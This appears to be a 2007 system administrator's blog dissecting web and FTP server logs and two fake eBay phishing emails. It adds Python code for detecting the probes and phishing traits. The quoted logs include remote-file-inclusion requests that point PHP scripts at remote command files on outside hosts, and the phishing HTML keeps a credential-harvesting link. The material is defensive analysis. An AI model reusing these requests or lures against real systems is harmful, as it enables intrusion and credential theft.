Web server log examined

Since 22-Sep-2007 there have been attempts to reach Yahoo.com in the UK – via this server:

"GET http://uk.yahoo.com/ HTTP/1.1"

The number keeps increasing; of all rejected requests this is now the most common one. All “403”, of course.
The number of W00tW00t requests increases as well, but all on HTTP/1.1 – and each fails with error 400. Have to find out why, because the HTTP/1.0 ones succeed.

And there are quite a lot of requests to cgi-bin/query. Stupid ones, but are they trying to bypass something?

Building Microsoft stuff won’t work, dudes:

GET /cgi-bin/query/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6551&STRMVER=4&CAPREQ=0 HTTP/1.1
GET /MSOffice/cltreq.asp HTTP/1.1
GET /cgi-bin/query/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6551&STRMVER=4&CAPREQ=0 HTTP/1.1

And trying to bypass security and monitoring using the server won’t work either:
GET /cgi-bin/query/openVMS/HOW_TO/CommunigatePro/oneadmin/config.php?path[docroot]=http://www.coverbands.info/images/echo.txt? HTTP/1.1
GET /cgi-bin/query/oneadmin/config.php?path[docroot]=http://www.coverbands.info/images/echo.txt? HTTP/1.1
GET /cgi-bin/query/oneadmin/config.php?path[docroot]=http://www.coverbands.info/images/echo.txt? HTTP/1.1
...
GET /cgi-bin/query/openVMS/HOW_TO/PHP/root.php?target=http://asantecaravans.co.za/content/rss1/cmd.txt? HTTP/1.1
GET /cgi-bin/query/root.php?target=http://asantecaravans.co.za/content/rss1/cmd.txt? HTTP/1.1
GET /cgi-bin/query/root.php?target=http://asantecaravans.co.za/content/rss1/cmd.txt? HTTP/1.1

I didn’t look into echo.txt and cmd.txt, but these are likely scripts.
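To turn the three patterns above (absolute-URI requests aimed at Yahoo, W00tW00t probes, and cgi-bin/query requests whose parameters point at remote .txt files) into something that can be counted automatically, here is an added example classifier; it is not code from the original post, and the sample request lines and the host remote.invalid are constructed stand-ins for the ones quoted above.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed request lines modelled on the ones quoted above
# (example data, not the original server log; remote.invalid is a placeholder).
SAMPLE_REQUESTS = [
    "GET http://uk.yahoo.com/ HTTP/1.1",
    "GET /w00tw00t.probe HTTP/1.1",
    "GET /cgi-bin/query/oneadmin/config.php?path[docroot]=http://remote.invalid/echo.txt? HTTP/1.1",
    "GET /cgi-bin/query/root.php?target=http://remote.invalid/cmd.txt? HTTP/1.1",
    "GET /cgi-bin/query/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6551&STRMVER=4&CAPREQ=0 HTTP/1.1",
    "GET /index.html HTTP/1.1",
]

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) (?P<version>HTTP/\d\.\d)$")
OFFICE_PATHS = ("/_vti_bin/", "/msoffice/")


def classify_request(line):
    """Return the probe categories a request line matches (empty list = ordinary)."""
    m = REQUEST_LINE.match(line.strip())
    if not m:
        return ["malformed"]
    parts = urlsplit(m.group("target"))
    tags = []
    # An absolute URI as request target: the client is using us as an open proxy.
    if parts.scheme in ("http", "https") and parts.netloc:
        tags.append("proxy-probe")
    path = parts.path.lower()
    if "w00tw00t" in path:
        tags.append("scanner-fingerprint")
    if any(p in path for p in OFFICE_PATHS):
        tags.append("frontpage-office-probe")
    # A query value that is itself a URL: the request tries to make a script on
    # this server include or fetch remote content.
    if any(v.lower().startswith(("http://", "https://", "ftp://"))
           for _, v in parse_qsl(parts.query, keep_blank_values=True)):
        tags.append("remote-url-parameter")
    return tags


def summarize(lines):
    """Count categories across many request lines ('ordinary' when none match)."""
    counts = Counter()
    for line in lines:
        counts.update(classify_request(line) or ["ordinary"])
    return counts
```

Feed it the request field of each 403/400 line from the access log and the counts show which probe family is growing week over week.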

FTP: I’ve seen it all before

It has been a while since I last saw this, but it’s all too familiar:

%%%%%%%%%%% OPCOM 3-OCT-2007 08:58:52.20 %%%%%%%%%%%
Message from user TCPIP$FTP on DIANA
User Name: anonymous
Source: 41.22-244-81.adsl-dyn.isp.belgacom.be
Status: NOPRIV -- File access violation
Object: WEB_DISK2:[public.anonymous.071003094018p]

It is another script: this time it starts with an attempt to create a directory – signalled in OPERATOR.LOG – inside a directory that is read-only:

%TCPIP-I-FTP_SESCON, FTP SERVER: session connection from 41.22-244-81.adsl-dyn.isp.belgacom.be at 3-OCT-2007 08:58:51.62
%TCPIP-I-FTP_NODE, client host name: 41.22-244-81.adsl-dyn.isp.belgacom.be
%TCPIP-I-FTP_USER, user name: anonymous
%TCPIP-I-FTP_OBJ, object: WEB_DISK2:[public.anonymous.071003094018p]
%TCPIP-I-FTP_CHINFO, TCPIP$FTPC0001A: Failed to create directory
%SYSTEM-F-NOPRIV, insufficient privilege or object protection violation
%TCPIP-I-FTP_NODE, client host name: 41.22-244-81.adsl-dyn.isp.belgacom.be

Accessing directories simply doesn’t work. Mainly because I didn’t set things up as a Windows (or Linux) box:

%TCPIP-I-FTP_OBJ, object: /pub/
%TCPIP-I-FTP_OBJ, object: /public/
%TCPIP-I-FTP_OBJ, object: /_vti_pvt/
%TCPIP-I-FTP_OBJ, object: /_vti_txt/
%TCPIP-I-FTP_OBJ, object: /_vti_cfg/
%TCPIP-I-FTP_OBJ, object: /_vti_log/
%TCPIP-I-FTP_OBJ, object: /_vti_cnf/
%TCPIP-I-FTP_OBJ, object: /_private/
%TCPIP-I-FTP_OBJ, object: /incoming/
%TCPIP-I-FTP_OBJ, object: /pub/incoming/
%TCPIP-I-FTP_OBJ, object: /public/incoming/
%TCPIP-I-FTP_OBJ, object: /public_html/
%TCPIP-I-FTP_OBJ, object: /upload/
%TCPIP-I-FTP_OBJ, object: /wwwroot/
%TCPIP-I-FTP_OBJ, object: /mailroot/
%TCPIP-I-FTP_OBJ, object: /ftproot/
%TCPIP-I-FTP_OBJ, object: /home/
%TCPIP-I-FTP_OBJ, object: /images/
%TCPIP-I-FTP_OBJ, object: /web/
%TCPIP-I-FTP_OBJ, object: /www/
%TCPIP-I-FTP_OBJ, object: /html/
%TCPIP-I-FTP_OBJ, object: /cgi-bin/
%TCPIP-I-FTP_OBJ, object: /usr/
%TCPIP-I-FTP_OBJ, object: /usr/incoming/
%TCPIP-I-FTP_OBJ, object: /temp/
%TCPIP-I-FTP_OBJ, object: /~temp/
%TCPIP-I-FTP_OBJ, object: /tmp/
%TCPIP-I-FTP_OBJ, object: /~tmp/
%TCPIP-I-FTP_OBJ, object: /outgoing/
%TCPIP-I-FTP_OBJ, object: /anonymous/
%TCPIP-I-FTP_OBJ, object: /anonymous/_vti_pvt/
%TCPIP-I-FTP_OBJ, object: /anonymous/_vti_cnf/
%TCPIP-I-FTP_OBJ, object: /anonymous/incoming/
%TCPIP-I-FTP_OBJ, object: /anonymous/pub/
%TCPIP-I-FTP_OBJ, object: /anonymous/public/

all fail with:

%TCPIP-I-FTP_CHINFO, TCPIP$FTPC0001A: Failed to set default directory
%SYSTEM-W-BADIRECTORY, bad directory file format
%TCPIP-I-FTP_USER, user name: anonymous

It all took just over 2 seconds:

%TCPIP-I-FTP_SESDCN, FTP SERVER: session disconnection from 41.22-244-81.adsl-dyn.isp.belgacom.be at 3-OCT-2007 08:58:53.47
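The give-away here is the rate: dozens of failed directory operations inside two seconds. As an added example (not code from the original post), here is a small parser for TCPIP$FTP log lines in the format quoted above that groups them per session and flags sessions whose failure rate no human would produce; the sample excerpt, the client host name and the thresholds are constructed assumptions.

```python
import re
from datetime import datetime

# Constructed excerpt in the format of the TCPIP$FTP log lines quoted above
# (sample data, not the original log; the client host name is a placeholder).
SAMPLE_LOG = """\
%TCPIP-I-FTP_SESCON, FTP SERVER: session connection from client.example.invalid at 3-OCT-2007 08:58:51.62
%TCPIP-I-FTP_OBJ, object: WEB_DISK2:[public.anonymous.071003094018p]
%TCPIP-I-FTP_CHINFO, TCPIP$FTPC0001A: Failed to create directory
%SYSTEM-F-NOPRIV, insufficient privilege or object protection violation
%TCPIP-I-FTP_OBJ, object: /pub/
%TCPIP-I-FTP_CHINFO, TCPIP$FTPC0001A: Failed to set default directory
%SYSTEM-W-BADIRECTORY, bad directory file format
%TCPIP-I-FTP_OBJ, object: /incoming/
%TCPIP-I-FTP_CHINFO, TCPIP$FTPC0001A: Failed to set default directory
%SYSTEM-W-BADIRECTORY, bad directory file format
%TCPIP-I-FTP_SESDCN, FTP SERVER: session disconnection from client.example.invalid at 3-OCT-2007 08:58:53.47
"""

SESCON = re.compile(r"FTP_SESCON, .*session connection from (\S+) at (.+)$")
SESDCN = re.compile(r"FTP_SESDCN, .*session disconnection from (\S+) at (.+)$")
FTP_OBJ = re.compile(r"FTP_OBJ, object: (.+)$")
TIME_FMT = "%d-%b-%Y %H:%M:%S.%f"  # OpenVMS style: 3-OCT-2007 08:58:51.62

MIN_FAILURES = 3        # assumed threshold: a person rarely produces
MIN_FAILURE_RATE = 1.0  # several failed directory operations per second

def parse_sessions(text):
    """Group SESCON..SESDCN lines into sessions and flag the scripted ones."""
    sessions, cur = [], None
    for line in text.splitlines():
        if m := SESCON.search(line):
            cur = {"host": m.group(1), "start": datetime.strptime(m.group(2).strip(), TIME_FMT),
                   "objects": [], "failures": 0}
        elif cur is None:
            continue
        elif m := FTP_OBJ.search(line):
            cur["objects"].append(m.group(1).strip())
        elif "FTP_CHINFO" in line and "Failed to" in line:
            cur["failures"] += 1
        elif m := SESDCN.search(line):
            dur = (datetime.strptime(m.group(2).strip(), TIME_FMT) - cur["start"]).total_seconds()
            rate = cur["failures"] / dur if dur > 0 else float("inf")
            cur.update(duration_s=dur, failure_rate=rate,
                       automated=cur["failures"] >= MIN_FAILURES and rate >= MIN_FAILURE_RATE)
            sessions.append(cur)
            cur = None
    return sessions
```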

Would belgacom.be be able to track the kid?

UPDATE
They did. Not that they can do a lot, but at least they replied.

UPDATE 2
And they stated they will take action to prevent this happening again.
They have sent a response telling what action is taken upon the abuse signal: they will track the person down, monitor his behaviour and remove the account on the next abuse. I would even have accepted “We won’t do anything because … “. Perfect! A lot of companies can take Belgacom as an example of how to react properly.

More E[B/d]ay to come

At least according to Hoff on his blog (read here). One good reason to have all incoming traffic run over the OpenVMS box (small chance that it will be infected!), and to be able to screen messages before actually downloading them onto Windows boxes. (I would like to have Apple systems around, but having game-playing kids around, I’m stuck with Windows. And the company I work at – and their customers – heavily rely on Windows boxes for their office work…)

There is a fair chance that this type of scam is now filtered – even better!

Ebay kit?

This might be correct:

kit message

The header looks quite honest as well:

Return-Path: sellers.tools@getfreenow.com
Received: from host75-97.pool217169.interbusiness.it (217.169.97.75)
by diana.intra.grootersnet.nl (V5.6-9, OpenVMS V8.3 Alpha);
Sat, 1 Sep 2007 12:44:47 +0100 (CET)
Received: from User ([70.91.163.25])
by mail.publiposter.it (Merak 7.4.2) with ASMTP id BJV74577;
Sat, 01 Sep 2007 12:44:42 +0200
Reply-To: <no.reply@eBay.com>
From: "eBay"<sellers.tools@getFREEnow.com>
Subject: Your eBay Success Kit has arrived
Date: Sat, 1 Sep 2007 05:45:17 -0500
MIME-Version: 1.0
Content-Type: text/plain;
charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000

but the missing TO: line, and a reply-to address at eBay, make it suspicious. As does the user address: 70.91.163.25. This is located in the USA:

Comcast Business Communications, Inc. CBC-CM-3 (NET-70-88-0-0-1)
70.88.0.0 - 70.91.255.255
Comcast Business Communications, Inc. CBC-LITTLEROCK-4 (NET-70-91-163-0-1)
70.91.163.0 - 70.91.163.255

# ARIN WHOIS database, last updated 2007-09-01 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

The receiving server (mail.publiposter.it) could be genuine:

Domain: publiposter.it
Status: ACTIVE
Created: 2002-06-14 00:00:00
Last Update: 2007-06-30 00:04:10
Expire Date: 2008-06-14

Registrant
Name: Publiposter & Multimedia s.p.a.
ContactID: PUBL355-ITNIC
Address: Publiposter & Multimedia s.p.a.
Isola Delle Femmine
90040
PA
IT
Created: 2007-03-01 10:39:36
Last Update: 2007-03-01 10:39:36

Admin Contact
Name: Alessio Alessi
ContactID: AA1731-ITNIC
Address: Publiposter & Multimedia s.p.a.
Isola Delle Femmine
90040
PA
IT
Created: 2002-06-14 00:00:00
Last Update: 2007-03-01 07:39:08

Technical Contacts
Name: Centro Gestione Village
ContactID: CGV35-ITNIC
Organization: Telecom Italia Spa
Address: Telecom Italia Spa
Via Pontina, km. 29,100
Roma
00040
RM
IT
Created: 2007-03-01 10:25:57
Last Update: 2007-03-06 14:04:12

Registrar
Organization: Telecom Italia s.p.a.
Name: INTERBUSINESS-MNT

Nameservers
dns6.interbusiness.it
dns3.nic.it

and interbusiness.it – also Italian – as well:

inetnum: 217.169.97.64 - 217.169.97.95
netname: IDC-DIALUP-POM-BLCK3
descr: IDC - Telecom Italia - network used in dialup access - Pomezia
country: it
admin-c: ITR2-RIPE
tech-c: ITR2-RIPE
status: assigned PA
mnt-by: FULCOM-MNT-RIPE
source: RIPE # Filtered

role: IT Telecom Role
address: Telecom Italia S.p.A.
address: Via Oriolo Romano, 257
address: Italy
phone: +390665679934(3)
fax-no: +390636870532
e-mail: ripe-noc@telecomitalia.it
remarks: trouble: ripe-noc@telecomitalia.it
admin-c: ITR2-RIPE
tech-c: ITR2-RIPE
nic-hdl: ITR2-RIPE
remarks: ##############################################
remarks: Pay attention
remarks: Any communication sent to email different
remarks: from the following will be ignored !
remarks: ##############################################
remarks: Any abuse and spamming reports, please
remarks: send them to abuse-ripe@telecomitalia.it
remarks: ##############################################
mnt-by: FULCOM-MNT-RIPE
source: RIPE # Filtered

Used in dial-up access – you can tell by the full address as well.

The domain interbusiness.it is valid as well:

Domain: interbusiness.it
Status: ACTIVE
Created: 1996-01-29 00:00:00
Last Update: 2007-01-30 00:36:13
Expire Date: 2008-01-29

Registrant
Name: Telecom Italia S.p.A.
ContactID: TELE616-ITNIC
Address: Via Paolo Di Dono, 44
Roma
00143
RM
IT
Created: 2007-03-01 10:44:12
Last Update: 2007-03-01 10:44:12

Admin Contact
Name: Camillo Di Vincenzo
ContactID: CD2-ITNIC
Address: Telecom Italia S.P.A.
Via Paolo Di Dono, 44
Roma
00143
RM
IT
Created: 2000-11-15 00:00:00
Last Update: 2007-03-01 07:49:08

Technical Contacts
Name: Domain Registration Staff
ContactID: DRS9-ITNIC
Address: Telecom Italia S.p.A.
Via Campania 11
Taranto
74100
TA
IT
Created: 2005-07-19 00:00:00
Last Update: 2007-08-08 10:51:21

Name: Gian Luca Mattu
ContactID: GLM2-ITNIC
Address: Telecom Italia SpA
Via Oriolo Romano, 240
Roma
00189
RM
IT
Created: 2005-03-09 00:00:00
Last Update: 2007-03-01 07:37:44

Name: Fabio Ginocchi
ContactID: FG82-ITNIC
Address: Telecom Italia
Via Oriolo Romano, 257
IT
Created: 2000-11-02 00:00:00
Last Update: 2007-03-01 07:38:47

Registrar
Organization: Telecom Italia s.p.a.
Name: INTERBUSINESS-MNT

Nameservers
dnsti.interbusiness.it
dns.opb.interbusiness.it
dns3.nic.it
dnsts.interbusiness.it

which makes sense, because this domain was mentioned earlier – its name server is used.

The link in the message, however, leads to Russia – it looks like a valid page but the contents are Russian, it contains a huge number of CGI redirects, and the link to get an English page returns a 404 message: Document not found.

This stinks!

Ebay – a bit altered

This message arrived today – from an Ebay – I mean, Eday member:

eday

With Outlook, Eday is easily read as Ebay…

Fake of course, sent to obtain credentials.
The header shows its origin: Australia – given the names, I’d say Melbourne:

Return-Path: member@eday.com
Received: from mail.southern-ro.com.au (203.46.24.242)
by xxxxxxxx.grootersnet.nl (V5.6-9, OpenVMS V8.3 Alpha);
Thu, 30 Aug 2007 13:40:27 +0100 (CET)
Received: from User ([195.84.14.70]) by melbserver.southern-ro.com.au with Microsoft SMTPSVC(6.0.3790.3959);
Thu, 30 Aug 2007 21:40:16 +1000
Reply-To: <member@eday.com>
From: "member"<member@eday.com>
Subject: message from member
Date: Thu, 30 Aug 2007 13:40:15 +0200
MIME-Version: 1.0
Content-Type: text/html;
charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Bcc:
Return-Path: member@eday.com
Message-ID: <MELBSERVERAtC33BcZY00000e29@melbserver.southern-ro.com.au>
X-OriginalArrivalTime: 30 Aug 2007 11:40:16.0643 (UTC) FILETIME=[891CAD30:01C7EAFA]

That is: from address 195.84.14.70, which is NOT an Ebay address, nor is the mail server that connected (203.46.24.242). Nor would Ebay use Outlook Express. In other words: it is a basic PC. No TO: line either; I wonder how the message got here in the first place.
No name in the message – which is not how eBay would do it.

Almost all links that could require a login refer to a site at oberleitner.biz. Even the ones where you could signal or learn about abuse:

Always remember to complete your transactions on eBay - it's the safer way to trade.</B><BR><BR>Is
this message an offer to buy your item directly through email without
winning the item on eBay? If so, please help make the eBay marketplace
safer by reporting it to us. These external transactions may be unsafe
and are against eBay policy. <A href="
http://www.oberleitner.biz/cache/ws/eBay_com_Verify_your_eBay_account_files/" target=_blank><FONT color=#003399>Learn more about trading safely</FONT></A>

A bit more down:

<B>Always remember to complete your transactions on eBay - it's the safer way to trade.</B><BR><BR>Is this message an offer to buy your item directly through email without winning the item on eBay? If so, please help make the eBay marketplace
safer by reporting it to us. These external transactions may be unsafe and are against eBay policy. <A href="
http://www.oberleitner.biz/cache/ws/eBay_com_Verify_your_eBay_account_files/"
target=_blank><FONT color=#003399>Learn more about trading safely</FONT></A>

and

Learn how you can protect yourself from spoof (fake) emails at:<BR><A href="http://www.oberleitner.biz/cache/ws/eBay_com_Verify_your_eBay_account_files/" target=_blank><FONT
color=#003399>https://pages.ebay.com/education/spooftutorial</FONT></A>

It looks like Oberleitner.biz’s business is getting user credentials. Or its domain is abused.
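The tells in both eBay lookalikes above (the missing TO: line, a Reply-To at a different domain than the sender, a From display name claiming eBay while the address lives elsewhere, and anchors whose visible text is an ebay.com URL while the href goes to oberleitner.biz) can be checked mechanically. The following is an added example, not code from the original post; the sample message combines the traits of both mails, with the URL paths and hostnames inside it constructed for illustration.

```python
import re
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlsplit

# Constructed message combining the traits of the two lookalike mails above
# (sample data, not the original messages; paths under oberleitner.biz are made up).
SAMPLE_MAIL = """\
Return-Path: sellers.tools@getfreenow.com
Reply-To: <no.reply@eBay.com>
From: "eBay"<sellers.tools@getfreenow.com>
Subject: Your eBay Success Kit has arrived
Content-Type: text/html; charset="Windows-1251"

Learn how you can protect yourself from spoof emails at:<BR><A href="
http://www.oberleitner.biz/cache/ws/verify/" target=_blank><FONT
color=#003399>https://pages.ebay.com/education/spooftutorial</FONT></A>
<A href="https://pages.ebay.com/help/">Help</A>
"""

# Anchors with nested tags (the mails wrap link text in <FONT>) and hrefs folded
# across a line break, as in the quoted HTML; inner tags are stripped afterwards.
ANCHOR = re.compile(r'<a\b[^>]*?href="([^"]*)"[^>]*>(.*?)</a>', re.I | re.S)
TAG = re.compile(r"<[^>]+>")

def host_of(url):
    return (urlsplit(url.strip()).hostname or "").lower()

def domain_of(header_value):
    return parseaddr(header_value or "")[1].rsplit("@", 1)[-1].lower()

def check_message(raw, brand="ebay"):
    """Return the phishing indicators found in a raw RFC 822 message."""
    msg, findings = message_from_string(raw), []
    if msg["To"] is None:
        findings.append("no To header")
    from_dom, reply_dom = domain_of(msg["From"]), domain_of(msg["Reply-To"])
    if brand in parseaddr(msg["From"] or "")[0].lower() and brand not in from_dom:
        findings.append(f"From claims {brand} but address is at {from_dom}")
    if reply_dom and reply_dom != from_dom:
        findings.append(f"Reply-To is at {reply_dom}, From is at {from_dom}")
    charset = msg.get_content_charset() or "ascii"
    body = msg.get_payload(decode=True).decode(charset, "replace")
    for href, inner in ANCHOR.findall(body):
        text = TAG.sub("", inner).strip()
        shown = host_of(text) if text.lower().startswith("http") else ""
        if shown and shown != host_of(href):
            findings.append(f"link text shows {shown} but points to {host_of(href)}")
    return findings
```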